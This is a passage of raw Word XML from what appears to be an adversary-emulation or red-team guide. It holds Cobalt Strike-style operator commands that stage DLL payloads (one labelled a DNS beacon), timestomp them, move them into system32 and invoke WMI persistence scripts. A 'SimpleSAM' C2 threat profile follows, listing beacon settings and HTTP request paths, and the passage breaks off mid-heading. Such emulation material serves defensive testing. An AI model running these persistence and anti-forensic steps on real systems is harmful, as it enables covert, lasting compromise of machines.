      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>FileTimeStamps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\windows\temp\KBDUS1.DLL "11/20/2010 4:29:11 PM"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>shell move c:\windows\temp\KBDUS1.DLL c:\windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>-import /data/PAYLOADS/wmi_persistence_kbdus1.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve"> Invoke-WMI-Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC64F4" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>wanAPI.dll (DNS Beacon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7379C66B" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cd c:\windows\temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>upload /data/PAYLOADS/staged/wanAPI.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-import /data/PAYLOADS/Set-FileTimeStamps.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>FileTimeStamps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\windows\temp\wanAPI.dll "07/13/2009 7:56:53 PM"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell move c:\windows\temp\wanAPI.dll c:\windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-import /data/PAYLOADS/wmi_persistence_wanapi.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Invoke-WMI-Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B03D9F" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ADAC2DC" w14:textId="77777777" w:rsidR="00643413" w:rsidRDefault="00643413" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09141495" w14:textId="77777777" w:rsidR="00643413" w:rsidRDefault="00643413" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0697463A" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348C3286" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68744E7D" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7D2662" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA12095" w14:textId="77777777" w:rsidR="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>THREAT PROFILE (SIMPLESAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCBF21F" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId122" w:anchor="description" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E1453F9" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 threat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>modeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> after basic HTTP C2 using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> and phishing as primary entry point. This profile represents commodity malware that doesn't focus on advanced techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE64097" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CHARACTERISTICS</w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:anchor="characteristics" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78489F1E" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 Backend: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="150D3FEE" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port(s): 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A5505" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C2 Communication using HTTP Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C6632" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Executes as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoded </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B699402" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP communication using IP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>addresses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C5FF6B5" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Persistence: Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78883965" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>HTTP Request Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EC803" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BD95B" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET: /s/ref=nb_sb_nos_2/143-3245</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566E4FB9" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POST /S2854/auth/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aws-hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60F559FA" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
